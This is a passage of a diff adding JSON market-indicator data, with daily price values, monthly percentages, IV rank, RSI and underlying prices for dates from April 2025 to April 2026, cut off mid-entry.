+ ], + [ + "2026-01-15", + 13351.940512667881 + ], + [ + "2026-01-16", + 13340.774105378392 + ], + [ + "2026-01-20", + 13057.320059625912 + ], + [ + "2026-01-21", + 13233.834332194647 + ], + [ + "2026-01-22", + 13330.036821979333 + ], + [ + "2026-01-23", + 13372.125083183764 + ], + [ + "2026-01-26", + 13430.963611475167 + ], + [ + "2026-01-27", + 13552.719313475265 + ], + [ + "2026-01-28", + 13597.5988484257 + ], + [ + "2026-01-29", + 13516.21359976284 + ], + [ + "2026-01-30", + 13353.87222632755 + ], + [ + "2026-02-02", + 13445.565634499042 + ], + [ + "2026-02-03", + 13238.987755796225 + ], + [ + "2026-02-04", + 13007.716224964328 + ], + [ + "2026-02-05", + 12820.46598130201 + ], + [ + "2026-02-06", + 13091.463623482761 + ], + [ + "2026-02-09", + 13191.746070990215 + ], + [ + "2026-02-10", + 13130.545392843238 + ], + [ + "2026-02-11", + 13165.762422578899 + ], + [ + "2026-02-12", + 12897.985178034578 + ], + [ + "2026-02-13", + 12925.471416215136 + ], + [ + "2026-02-17", + 12912.156764862548 + ], + [ + "2026-02-18", + 13008.574472745187 + ], + [ + "2026-02-19", + 12958.755419985651 + ], + [ + "2026-02-20", + 13073.425984724501 + ], + [ + "2026-02-23", + 12914.518914718123 + ], + [ + "2026-02-24", + 13053.240101903144 + ], + [ + "2026-02-25", + 13242.423371530609 + ], + [ + "2026-02-26", + 13082.659366048847 + ], + [ + "2026-02-27", + 13040.785010636891 + ], + [ + "2026-03-02", + 13057.964401614294 + ], + [ + "2026-03-03", + 12918.171060855935 + ], + [ + "2026-03-04", + 13115.085122038503 + ], + [ + "2026-03-05", + 13075.571604176648 + ], + [ + "2026-03-06", + 12878.872761092032 + ], + [ + "2026-03-09", + 13050.877952047571 + ], + [ + "2026-03-10", + 13051.093170145523 + ], + [ + "2026-03-11", + 13049.37536227833 + ], + [ + "2026-03-12", + 12825.404186805634 + ], + [ + "2026-03-13", + 12749.386267536831 + ], + [ + "2026-03-16", + 12892.401318237096 + ], + [ + "2026-03-17", + 12955.319804251267 + ], + [ + "2026-03-18", + 12774.72688626524 + ], + [ + "2026-03-19", + 12734.355120622526 + ], + [ + "2026-03-20", + 12499.002319762389 + ], + [ + "2026-03-23", + 12642.477989684492 + ], + [ + "2026-03-24", + 12556.04430185808 + ], + [ + "2026-03-25", + 12638.608000837776 + ], + [ + "2026-03-26", + 12336.950965837144 + ], + [ + "2026-03-27", + 12095.927693018155 + ], + [ + "2026-03-30", + 12003.474459976454 + ], + [ + "2026-03-31", + 12409.839036547313 + ], + [ + "2026-04-01", + 12563.13993756313 + ], + [ + "2026-04-02", + 12577.545114765708 + ], + [ + "2026-04-06", + 12653.228396138305 + ], + [ + "2026-04-07", + 12655.1640467144 + ], + [ + "2026-04-08", + 13031.428272597868 + ], + [ + "2026-04-09", + 13119.581080596947 + ], + [ + "2026-04-10", + 13138.501900940097 + ], + [ + "2026-04-13", + 13274.387195992955 + ], + [ + "2026-04-14", + 13515.410468811944 + ], + [ + "2026-04-15", + 13704.61867224344 + ], + [ + "2026-04-16", + 13770.625013041035 + ], + [ + "2026-04-17", + 13950.801930191385 + ], + [ + "2026-04-20", + 13906.510308093893 + ], + [ + "2026-04-21", + 13853.619148216636 + ], + [ + "2026-04-22", + 14085.397228962005 + ], + [ + "2026-04-23", + 14006.059176840643 + ] + ], + "monthly_pct": [ + [ + "2025-05-31", + 0.24662697723032423 + ], + [ + "2025-06-30", + 0.2348690548344079 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.24662697723030202 + ], + [ + "2025-09-30", + 0.24662697723030202 + ], + [ + "2025-10-31", + 0.2701469599276862 + ], + [ + "2025-11-30", + 1.243596258952806 + ], + [ + "2025-12-31", + 0.2583862788740454 + ], + [ + "2026-01-31", + 0.2348690548344523 + ], + [ + "2026-02-28", + 0.867268629046114 + ], + [ + "2026-03-31", + 0.4166022111075085 + ], + [ + "2026-04-30", + 0.7495529312326443 + ] + ], + "ivr": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 50.0 + ], + [ + "2025-04-29", + 50.0 + ], + [ + "2025-04-30", + 50.0 + ], + [ + "2025-05-01", + 50.0 + ], + [ + "2025-05-02", + 50.0 + ], + [ + "2025-05-05", + 50.0 + ], + [ + "2025-05-06", + 50.0 + ], + [ + "2025-05-07", + 50.0 + ], + [ + "2025-05-08", + 50.0 + ], + [ + "2025-05-09", + 50.0 + ], + [ + "2025-05-12", + 50.0 + ], + [ + "2025-05-13", + 50.0 + ], + [ + "2025-05-14", + 50.0 + ], + [ + "2025-05-15", + 50.0 + ], + [ + "2025-05-16", + 50.0 + ], + [ + "2025-05-19", + 50.0 + ], + [ + "2025-05-20", + 50.0 + ], + [ + "2025-05-21", + 50.0 + ], + [ + "2025-05-22", + 50.0 + ], + [ + "2025-05-23", + 100.0 + ], + [ + "2025-05-27", + 100.0 + ], + [ + "2025-05-28", + 100.0 + ], + [ + "2025-05-29", + 98.13560853763677 + ], + [ + "2025-05-30", + 94.47705419833481 + ], + [ + "2025-06-02", + 72.10839216870109 + ], + [ + "2025-06-03", + 59.35981061300848 + ], + [ + "2025-06-04", + 25.53024723768767 + ], + [ + "2025-06-05", + 51.95911192656937 + ], + [ + "2025-06-06", + 51.116098140448685 + ], + [ + "2025-06-09", + 48.086109300986145 + ], + [ + "2025-06-10", + 0.0 + ], + [ + "2025-06-11", + 0.0 + ], + [ + "2025-06-12", + 0.0 + ], + [ + "2025-06-13", + 12.569516515662402 + ], + [ + "2025-06-16", + 22.304270581266852 + ], + [ + "2025-06-17", + 29.316724755564415 + ], + [ + "2025-06-18", + 28.357499783601465 + ], + [ + "2025-06-20", + 16.53604878846068 + ], + [ + "2025-06-23", + 21.63810865591295 + ], + [ + "2025-06-24", + 23.336501380965952 + ], + [ + "2025-06-25", + 0.0 + ], + [ + "2025-06-26", + 0.5122921884163811 + ], + [ + "2025-06-27", + 0.4926519418170729 + ], + [ + "2025-06-30", + 0.017764384463952367 + ], + [ + "2025-07-01", + 6.550103444247908 + ], + [ + "2025-07-02", + 5.7819356352769695 + ], + [ + "2025-07-03", + 9.05875145857824 + ], + [ + "2025-07-07", + 8.619809150422851 + ], + [ + "2025-07-08", + 5.3206162669687 + ], + [ + "2025-07-09", + 6.800810262560299 + ], + [ + "2025-07-10", + 6.409673229284232 + ], + [ + "2025-07-11", + 5.828169407007466 + ], + [ + "2025-07-14", + 5.991963570799676 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.3412175798715295 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.8131367338006287 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 1.5541682101982517 + ], + [ + "2025-08-01", + 21.815226058712227 + ], + [ + "2025-08-04", + 34.32352535541449 + ], + [ + "2025-08-05", + 36.920687553872575 + ], + [ + "2025-08-06", + 41.10078020213085 + ], + [ + "2025-08-07", + 41.071366201187814 + ], + [ + "2025-08-08", + 42.785765688058355 + ], + [ + "2025-08-11", + 43.424033237973525 + ], + [ + "2025-08-12", + 47.84247811790095 + ], + [ + "2025-08-13", + 47.88433705966988 + ], + [ + "2025-08-14", + 46.733238049515855 + ], + [ + "2025-08-15", + 47.92642514018333 + ], + [ + "2025-08-18", + 47.439018174611384 + ], + [ + "2025-08-19", + 53.851872379029075 + ], + [ + "2025-08-20", + 54.75513281159712 + ], + [ + "2025-08-21", + 55.30991454008355 + ], + [ + "2025-08-22", + 62.86967458171495 + ], + [ + "2025-08-25", + 62.89941602348463 + ], + [ + "2025-08-26", + 63.23929572701535 + ], + [ + "2025-08-27", + 63.26178630927465 + ], + [ + "2025-08-28", + 62.96934810000452 + ], + [ + "2025-08-29", + 53.454329905908 + ], + [ + "2025-09-02", + 44.98096517703985 + ], + [ + "2025-09-03", + 45.016161843870925 + ], + [ + "2025-09-04", + 42.24202543342081 + ], + [ + "2025-09-05", + 41.92409857915209 + ], + [ + "2025-09-08", + 39.648820484705624 + ], + [ + "2025-09-09", + 39.411182836437035 + ], + [ + "2025-09-10", + 33.10271256024075 + ], + [ + "2025-09-11", + 34.46220683895274 + ], + [ + "2025-09-12", + 35.04110342489686 + ], + [ + "2025-09-15", + 36.32684875446894 + ], + [ + "2025-09-16", + 36.4001406016818 + ], + [ + "2025-09-17", + 26.67753025654575 + ], + [ + "2025-09-18", + 25.81010646026709 + ], + [ + "2025-09-19", + 23.88976525585179 + ], + [ + "2025-09-22", + 16.362509881063374 + ], + [ + "2025-09-23", + 19.377961864334342 + ], + [ + "2025-09-24", + 20.952811303014187 + ], + [ + "2025-09-25", + 22.983284206959027 + ], + [ + "2025-09-26", + 22.247971561901934 + ], + [ + "2025-09-29", + 11.761630633043007 + ], + [ + "2025-09-30", + 3.7911558612600635 + ], + [ + "2025-10-01", + 2.343327036473845 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 3.299409155641003 + ], + [ + "2025-10-06", + 4.703887359046681 + ], + [ + "2025-10-07", + 8.434799640979787 + ], + [ + "2025-10-08", + 13.229869931754749 + ], + [ + "2025-10-09", + 13.392889152337235 + ], + [ + "2025-10-10", + 67.23148618501497 + ], + [ + "2025-10-13", + 78.29158611208375 + ], + [ + "2025-10-14", + 79.84515076919567 + ], + [ + "2025-10-15", + 80.65715521641378 + ], + [ + "2025-10-16", + 79.2243198856955 + ], + [ + "2025-10-17", + 79.13006814041829 + ], + [ + "2025-10-20", + 82.50046052892112 + ], + [ + "2025-10-21", + 80.9083571161861 + ], + [ + "2025-10-22", + 83.57787609555363 + ], + [ + "2025-10-23", + 84.23775946898137 + ], + [ + "2025-10-24", + 86.25631062464481 + ], + [ + "2025-10-27", + 92.7399938248186 + ], + [ + "2025-10-28", + 93.44043458849539 + ], + [ + "2025-10-29", + 93.39500381204412 + ], + [ + "2025-10-30", + 100.0 + ], + [ + "2025-10-31", + 99.21397093705978 + ], + [ + "2025-11-03", + 98.63650543973615 + ], + [ + "2025-11-04", + 100.0 + ], + [ + "2025-11-05", + 98.37480202236267 + ], + [ + "2025-11-06", + 100.0 + ], + [ + "2025-11-07", + 73.03468381661962 + ], + [ + "2025-11-10", + 73.67992703899637 + ], + [ + "2025-11-11", + 72.42926250771526 + ], + [ + "2025-11-12", + 71.9252909876491 + ], + [ + "2025-11-13", + 82.18142914687277 + ], + [ + "2025-11-14", + 81.42465967909139 + ], + [ + "2025-11-17", + 79.38448336264445 + ], + [ + "2025-11-18", + 82.09651531407546 + ], + [ + "2025-11-19", + 81.32385635053934 + ], + [ + "2025-11-20", + 90.16718353088248 + ], + [ + "2025-11-21", + 88.7816320283116 + ], + [ + "2025-11-24", + 96.0741976541445 + ], + [ + "2025-11-25", + 95.53285995795892 + ], + [ + "2025-11-26", + 97.01328534652863 + ], + [ + "2025-11-28", + 94.51676425759871 + ], + [ + "2025-12-01", + 93.99185741917245 + ], + [ + "2025-12-02", + 94.88590819929415 + ], + [ + "2025-12-03", + 86.68119620816073 + ], + [ + "2025-12-04", + 85.8358595231778 + ], + [ + "2025-12-05", + 77.97575843885217 + ], + [ + "2025-12-08", + 77.73362121345437 + ], + [ + "2025-12-09", + 66.92529545193958 + ], + [ + "2025-12-10", + 67.02435315695196 + ], + [ + "2025-12-11", + 67.30670508093081 + ], + [ + "2025-12-12", + 66.23812458801467 + ], + [ + "2025-12-15", + 66.92846292934554 + ], + [ + "2025-12-16", + 65.00209554999184 + ], + [ + "2025-12-17", + 70.20684863709702 + ], + [ + "2025-12-18", + 74.09114744600438 + ], + [ + "2025-12-19", + 61.22145334293103 + ], + [ + "2025-12-22", + 60.68972072042595 + ], + [ + "2025-12-23", + 45.16291422184713 + ], + [ + "2025-12-24", + 44.498006364582125 + ], + [ + "2025-12-26", + 42.628455682225876 + ], + [ + "2025-12-29", + 42.02360914044271 + ], + [ + "2025-12-30", + 41.912412111843544 + ], + [ + "2025-12-31", + 42.05287654856679 + ], + [ + "2026-01-02", + 41.81216614017335 + ], + [ + "2026-01-05", + 44.19548206947793 + ], + [ + "2026-01-06", + 46.23620744768147 + ], + [ + "2026-01-07", + 46.156130639765884 + ], + [ + "2026-01-08", + 47.08323470248455 + ], + [ + "2026-01-09", + 49.55339846427703 + ], + [ + "2026-01-12", + 49.27506318187831 + ], + [ + "2026-01-13", + 36.524742028849026 + ], + [ + "2026-01-14", + 39.79257829304721 + ], + [ + "2026-01-15", + 39.97824707495373 + ], + [ + "2026-01-16", + 25.961069313909373 + ], + [ + "2026-01-20", + 36.70087985516826 + ], + [ + "2026-01-21", + 36.82328429323839 + ], + [ + "2026-01-22", + 38.00007651523995 + ], + [ + "2026-01-23", + 37.55350635589629 + ], + [ + "2026-01-26", + 37.94622124520444 + ], + [ + "2026-01-27", + 40.41427555420146 + ], + [ + "2026-01-28", + 39.563225707266945 + ], + [ + "2026-01-29", + 40.733670050008094 + ], + [ + "2026-01-30", + 43.300922023999746 + ], + [ + "2026-02-02", + 44.16679830715203 + ], + [ + "2026-02-03", + 50.20822260294272 + ], + [ + "2026-02-04", + 55.49870606471154 + ], + [ + "2026-02-05", + 59.417411807159034 + ], + [ + "2026-02-06", + 71.56156999114008 + ], + [ + "2026-02-09", + 70.59180610933181 + ], + [ + "2026-02-10", + 70.78340808561674 + ], + [ + "2026-02-11", + 71.11179945537837 + ], + [ + "2026-02-12", + 77.5901425958653 + ], + [ + "2026-02-13", + 77.22313116015684 + ], + [ + "2026-02-17", + 77.23939246151843 + ], + [ + "2026-02-18", + 69.29808190520285 + ], + [ + "2026-02-19", + 64.73401102553987 + ], + [ + "2026-02-20", + 65.19368625784261 + ], + [ + "2026-02-23", + 67.57670322769584 + ], + [ + "2026-02-24", + 70.43432105401493 + ], + [ + "2026-02-25", + 73.60248732852361 + ], + [ + "2026-02-26", + 75.47470929095776 + ], + [ + "2026-02-27", + 75.15496696826418 + ], + [ + "2026-03-02", + 72.67659450149434 + ], + [ + "2026-03-03", + 72.95758653862765 + ], + [ + "2026-03-04", + 74.38769445100968 + ], + [ + "2026-03-05", + 67.29980577836191 + ], + [ + "2026-03-06", + 67.98429735032163 + ], + [ + "2026-03-09", + 61.354537213589175 + ], + [ + "2026-03-10", + 59.6492468350821 + ], + [ + "2026-03-11", + 59.19277146171281 + ], + [ + "2026-03-12", + 65.69600862971201 + ], + [ + "2026-03-13", + 56.56399671519302 + ], + [ + "2026-03-16", + 60.09722785672322 + ], + [ + "2026-03-17", + 60.74258422698373 + ], + [ + "2026-03-18", + 64.20725923249226 + ], + [ + "2026-03-19", + 64.10640166735784 + ], + [ + "2026-03-20", + 69.20029092028469 + ], + [ + "2026-03-23", + 70.8569350606121 + ], + [ + "2026-03-24", + 67.93705139382318 + ], + [ + "2026-03-25", + 63.163862712764555 + ], + [ + "2026-03-26", + 72.17252522733904 + ], + [ + "2026-03-27", + 78.44710251510755 + ], + [ + "2026-03-30", + 78.1158790886751 + ], + [ + "2026-03-31", + 100.0 + ], + [ + "2026-04-01", + 98.53021399161764 + ], + [ + "2026-04-02", + 98.66221151309882 + ], + [ + "2026-04-06", + 96.2474295566211 + ], + [ + "2026-04-07", + 92.50708059008002 + ], + [ + "2026-04-08", + 100.0 + ], + [ + "2026-04-09", + 100.0 + ], + [ + "2026-04-10", + 95.07542179578917 + ], + [ + "2026-04-13", + 95.22572917431317 + ], + [ + "2026-04-14", + 97.9821083214526 + ], + [ + "2026-04-15", + 99.92799313037568 + ], + [ + "2026-04-16", + 95.1374626784096 + ], + [ + "2026-04-17", + 95.52925500473681 + ], + [ + "2026-04-20", + 87.07640604484067 + ], + [ + "2026-04-21", + 87.66358451268171 + ], + [ + "2026-04-22", + 87.24541456595864 + ], + [ + "2026-04-23", + 89.23358445504536 + ] + ], + "rsi": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 99.77909058505757 + ], + [ + "2025-04-29", + 99.78950970263585 + ], + [ + "2025-04-30", + 99.6920632887655 + ], + [ + "2025-05-01", + 99.72227104433989 + ], + [ + "2025-05-02", + 99.75238908808662 + ], + [ + "2025-05-05", + 95.24102282644206 + ], + [ + "2025-05-06", + 88.52128355409826 + ], + [ + "2025-05-07", + 88.87474945128156 + ], + [ + "2025-05-08", + 89.77039981587744 + ], + [ + "2025-05-09", + 89.27401527377852 + ], + [ + "2025-05-12", + 92.17034655346365 + ], + [ + "2025-05-13", + 92.96666208851674 + ], + [ + "2025-05-14", + 93.26130887416511 + ], + [ + "2025-05-15", + 93.31692368722413 + ], + [ + "2025-05-16", + 93.54444725478156 + ], + [ + "2025-05-19", + 93.5963903312624 + ], + [ + "2025-05-20", + 90.85656395607847 + ], + [ + "2025-05-21", + 80.33443416725981 + ], + [ + "2025-05-22", + 80.65481875354706 + ], + [ + "2025-05-23", + 74.2002509995294 + ], + [ + "2025-05-27", + 78.7988247017787 + ], + [ + "2025-05-28", + 75.98636043166576 + ], + [ + "2025-05-29", + 76.38716503852021 + ], + [ + "2025-05-30", + 75.29913054688694 + ], + [ + "2025-06-02", + 77.05855920989904 + ], + [ + "2025-06-03", + 78.68928839047385 + ], + [ + "2025-06-04", + 79.2599002330387 + ], + [ + "2025-06-05", + 73.51990060541829 + ], + [ + "2025-06-06", + 75.9386807885907 + ], + [ + "2025-06-09", + 76.29325491949976 + ], + [ + "2025-06-10", + 77.87340859480865 + ], + [ + "2025-06-11", + 75.1084265756187 + ], + [ + "2025-06-12", + 75.7522736507445 + ], + [ + "2025-06-13", + 65.91169993828494 + ], + [ + "2025-06-16", + 70.43648787291909 + ], + [ + "2025-06-17", + 63.93989919002058 + ], + [ + "2025-06-18", + 63.83033534307848 + ], + [ + "2025-06-20", + 61.12430551154022 + ], + [ + "2025-06-23", + 65.11833459654389 + ], + [ + "2025-06-24", + 70.09043270705129 + ], + [ + "2025-06-25", + 70.84993844683783 + ], + [ + "2025-06-26", + 73.50660720176624 + ], + [ + "2025-06-27", + 74.43398467943769 + ], + [ + "2025-06-30", + 76.14131922311421 + ], + [ + "2025-07-01", + 69.58607580362956 + ], + [ + "2025-07-02", + 71.73339506087443 + ], + [ + "2025-07-03", + 74.49241257570912 + ], + [ + "2025-07-07", + 68.89405255497142 + ], + [ + "2025-07-08", + 69.07923324809758 + ], + [ + "2025-07-09", + 71.39216502925137 + ], + [ + "2025-07-10", + 70.23459366064954 + ], + [ + "2025-07-11", + 68.36915584868947 + ], + [ + "2025-07-14", + 69.76002638773934 + ], + [ + "2025-07-15", + 70.11901556162763 + ], + [ + "2025-07-16", + 70.54007866466056 + ], + [ + "2025-07-17", + 73.69760727147735 + ], + [ + "2025-07-18", + 72.69301916516308 + ], + [ + "2025-07-21", + 74.69498060605783 + ], + [ + "2025-07-22", + 69.21177621980242 + ], + [ + "2025-07-23", + 71.20731671964347 + ], + [ + "2025-07-24", + 72.11955684279756 + ], + [ + "2025-07-25", + 73.15760020410615 + ], + [ + "2025-07-28", + 74.48878025057897 + ], + [ + "2025-07-29", + 72.56210808284135 + ], + [ + "2025-07-30", + 73.20664835830254 + ], + [ + "2025-07-31", + 66.53937763328716 + ], + [ + "2025-08-01", + 48.83035058743897 + ], + [ + "2025-08-04", + 59.491484159348786 + ], + [ + "2025-08-05", + 54.877129655398676 + ], + [ + "2025-08-06", + 60.8905443992392 + ], + [ + "2025-08-07", + 62.361576191207014 + ], + [ + "2025-08-08", + 66.15352263111251 + ], + [ + "2025-08-11", + 63.93272778999119 + ], + [ + "2025-08-12", + 68.72177053315974 + ], + [ + "2025-08-13", + 68.90093110003409 + ], + [ + "2025-08-14", + 68.24770570148405 + ], + [ + "2025-08-15", + 64.51595092703118 + ], + [ + "2025-08-18", + 64.17503101017843 + ], + [ + "2025-08-19", + 53.761331177346946 + ], + [ + "2025-08-20", + 49.9902932016917 + ], + [ + "2025-08-21", + 47.22512999104658 + ], + [ + "2025-08-22", + 55.93214558723043 + ], + [ + "2025-08-25", + 54.106897943429466 + ], + [ + "2025-08-26", + 56.24120925592881 + ], + [ + "2025-08-27", + 57.067627184038564 + ], + [ + "2025-08-28", + 60.35659214746611 + ], + [ + "2025-08-29", + 52.32423931149453 + ], + [ + "2025-09-02", + 47.45726599044207 + ], + [ + "2025-09-03", + 51.93916957401956 + ], + [ + "2025-09-04", + 56.56568615207028 + ], + [ + "2025-09-05", + 57.27812661698215 + ], + [ + "2025-09-08", + 59.688798322809795 + ], + [ + "2025-09-09", + 61.069474497369214 + ], + [ + "2025-09-10", + 61.235159117819364 + ], + [ + "2025-09-11", + 64.1570572993529 + ], + [ + "2025-09-12", + 66.2483129846353 + ], + [ + "2025-09-15", + 69.92516974880476 + ], + [ + "2025-09-16", + 69.1174910933047 + ], + [ + "2025-09-17", + 67.14655215439855 + ], + [ + "2025-09-18", + 71.14227624147154 + ], + [ + "2025-09-19", + 73.74705646695081 + ], + [ + "2025-09-22", + 75.8167267480667 + ], + [ + "2025-09-23", + 69.1869652211819 + ], + [ + "2025-09-24", + 65.92749571427227 + ], + [ + "2025-09-25", + 62.07344438638052 + ], + [ + "2025-09-26", + 64.21248019245078 + ], + [ + "2025-09-29", + 66.51322049362255 + ], + [ + "2025-09-30", + 67.83642658367205 + ], + [ + "2025-10-01", + 70.07275887515618 + ], + [ + "2025-10-02", + 71.88557500032536 + ], + [ + "2025-10-03", + 67.36703973348266 + ], + [ + "2025-10-06", + 70.87006686784594 + ], + [ + "2025-10-07", + 65.51955798505378 + ], + [ + "2025-10-08", + 70.68181602105999 + ], + [ + "2025-10-09", + 69.48553247243406 + ], + [ + "2025-10-10", + 45.648473850391824 + ], + [ + "2025-10-13", + 55.37654854760851 + ], + [ + "2025-10-14", + 52.154200613603706 + ], + [ + "2025-10-15", + 55.11431254058814 + ], + [ + "2025-10-16", + 53.23984692975436 + ], + [ + "2025-10-17", + 56.081899632184616 + ], + [ + "2025-10-20", + 61.01108625111863 + ], + [ + "2025-10-21", + 60.85647872679759 + ], + [ + "2025-10-22", + 55.29931674061824 + ], + [ + "2025-10-23", + 58.80057637907499 + ], + [ + "2025-10-24", + 62.818024276690835 + ], + [ + "2025-10-27", + 68.40982717293689 + ], + [ + "2025-10-28", + 70.50895668625509 + ], + [ + "2025-10-29", + 71.70378060801298 + ], + [ + "2025-10-30", + 62.41596270576851 + ], + [ + "2025-10-31", + 63.977249188546295 + ], + [ + "2025-11-03", + 65.51481342906033 + ], + [ + "2025-11-04", + 54.78121828919265 + ], + [ + "2025-11-05", + 57.15571290122743 + ], + [ + "2025-11-06", + 49.14873721887083 + ], + [ + "2025-11-07", + 47.94626153310704 + ], + [ + "2025-11-10", + 56.0416927639421 + ], + [ + "2025-11-11", + 54.910031751550186 + ], + [ + "2025-11-12", + 54.559789315582954 + ], + [ + "2025-11-13", + 46.325446043790606 + ], + [ + "2025-11-14", + 46.64005365968731 + ], + [ + "2025-11-17", + 43.53348415792319 + ], + [ + "2025-11-18", + 39.525953765081624 + ], + [ + "2025-11-19", + 42.2967228621354 + ], + [ + "2025-11-20", + 35.341154400915315 + ], + [ + "2025-11-21", + 38.704769450336755 + ], + [ + "2025-11-24", + 48.58340653917153 + ], + [ + "2025-11-25", + 50.69856740395926 + ], + [ + "2025-11-26", + 53.659621055736054 + ], + [ + "2025-11-28", + 56.2773479215203 + ], + [ + "2025-12-01", + 54.88283151323305 + ], + [ + "2025-12-02", + 57.515448151000996 + ], + [ + "2025-12-03", + 58.33933418520138 + ], + [ + "2025-12-04", + 57.87814088963881 + ], + [ + "2025-12-05", + 59.39219461406007 + ], + [ + "2025-12-08", + 58.32551380847183 + ], + [ + "2025-12-09", + 58.83635751209879 + ], + [ + "2025-12-10", + 60.56711937372682 + ], + [ + "2025-12-11", + 58.46787584184793 + ], + [ + "2025-12-12", + 47.92773452332186 + ], + [ + "2025-12-15", + 45.64566936066763 + ], + [ + "2025-12-16", + 46.71899454660168 + ], + [ + "2025-12-17", + 38.95511496425244 + ], + [ + "2025-12-18", + 46.32480227982235 + ], + [ + "2025-12-19", + 52.018136333704845 + ], + [ + "2025-12-22", + 53.97652681542883 + ], + [ + "2025-12-23", + 55.88033440524325 + ], + [ + "2025-12-24", + 57.08031724623279 + ], + [ + "2025-12-26", + 57.04357026669955 + ], + [ + "2025-12-29", + 54.20813649794225 + ], + [ + "2025-12-30", + 52.85889948820763 + ], + [ + "2025-12-31", + 48.25967908271054 + ], + [ + "2026-01-02", + 47.231073654652754 + ], + [ + "2026-01-05", + 51.76237360380834 + ], + [ + "2026-01-06", + 56.27126589166128 + ], + [ + "2026-01-07", + 56.75235578598161 + ], + [ + "2026-01-08", + 53.03488762183157 + ], + [ + "2026-01-09", + 58.17147388559157 + ], + [ + "2026-01-12", + 58.5819512685294 + ], + [ + "2026-01-13", + 57.495244589795114 + ], + [ + "2026-01-14", + 50.27100327423319 + ], + [ + "2026-01-15", + 52.41725744352951 + ], + [ + "2026-01-16", + 51.85525056180009 + ], + [ + "2026-01-20", + 40.1013876890846 + ], + [ + "2026-01-21", + 48.00508983513797 + ], + [ + "2026-01-22", + 51.742492246819566 + ], + [ + "2026-01-23", + 53.323262933392996 + ], + [ + "2026-01-26", + 55.51699509470088 + ], + [ + "2026-01-27", + 59.734260943216086 + ], + [ + "2026-01-28", + 61.194661729284974 + ], + [ + "2026-01-29", + 57.14693350942553 + ], + [ + "2026-01-30", + 50.037118477223174 + ], + [ + "2026-02-02", + 53.55211498154961 + ], + [ + "2026-02-03", + 45.74406543516551 + ], + [ + "2026-02-04", + 38.905031625802266 + ], + [ + "2026-02-05", + 34.41826148535826 + ], + [ + "2026-02-06", + 44.41022361793613 + ], + [ + "2026-02-09", + 47.59227548070815 + ], + [ + "2026-02-10", + 45.86673119499465 + ], + [ + "2026-02-11", + 47.05628803916824 + ], + [ + "2026-02-12", + 39.88025398849115 + ], + [ + "2026-02-13", + 40.87692123704963 + ], + [ + "2026-02-17", + 40.52643527227851 + ], + [ + "2026-02-18", + 44.25394092888129 + ], + [ + "2026-02-19", + 42.76258389579081 + ], + [ + "2026-02-20", + 47.175317774297476 + ], + [ + "2026-02-23", + 42.30763348881604 + ], + [ + "2026-02-24", + 47.40917914659372 + ], + [ + "2026-02-25", + 53.45408584156084 + ], + [ + "2026-02-26", + 48.395116066582084 + ], + [ + "2026-02-27", + 47.135937831689326 + ], + [ + "2026-03-02", + 47.73673314705732 + ], + [ + "2026-03-03", + 43.41308759694169 + ], + [ + "2026-03-04", + 50.2486906147757 + ], + [ + "2026-03-05", + 48.97034682672318 + ], + [ + "2026-03-06", + 43.09312958565454 + ], + [ + "2026-03-09", + 48.87174708554506 + ], + [ + "2026-03-10", + 48.878742004663245 + ], + [ + "2026-03-11", + 48.82132879563378 + ], + [ + "2026-03-12", + 41.909315090662794 + ], + [ + "2026-03-13", + 39.847252204726225 + ], + [ + "2026-03-16", + 45.30015650420609 + ], + [ + "2026-03-17", + 47.55271769120918 + ], + [ + "2026-03-18", + 42.18317924637576 + ], + [ + "2026-03-19", + 41.06679390827159 + ], + [ + "2026-03-20", + 35.21569556715565 + ], + [ + "2026-03-23", + 40.75717740743673 + ], + [ + "2026-03-24", + 38.61431673656675 + ], + [ + "2026-03-25", + 41.76403626494997 + ], + [ + "2026-03-26", + 34.748648157122034 + ], + [ + "2026-03-27", + 30.36043749594191 + ], + [ + "2026-03-30", + 28.85514590350796 + ], + [ + "2026-03-31", + 42.378277403552275 + ], + [ + "2026-04-01", + 46.50901777091294 + ], + [ + "2026-04-02", + 46.89426688706331 + ], + [ + "2026-04-06", + 48.973590659036056 + ], + [ + "2026-04-07", + 49.02855984501532 + ], + [ + "2026-04-08", + 58.408138088038406 + ], + [ + "2026-04-09", + 60.25350670187023 + ], + [ + "2026-04-10", + 60.65699485840208 + ], + [ + "2026-04-13", + 63.521111821731104 + ], + [ + "2026-04-14", + 67.97449809049708 + ], + [ + "2026-04-15", + 70.9705744660592 + ], + [ + "2026-04-16", + 71.9562268122709 + ], + [ + "2026-04-17", + 74.50130671316494 + ], + [ + "2026-04-20", + 72.75337195184355 + ], + [ + "2026-04-21", + 70.62253213851496 + ], + [ + "2026-04-22", + 74.18999686741846 + ], + [ + "2026-04-23", + 71.01117717347967 + ] + ], + "underlying": [ + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723163604736328 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18792152404785 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500734329223633 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976760864258 + ], + [ + "2025-05-27", + 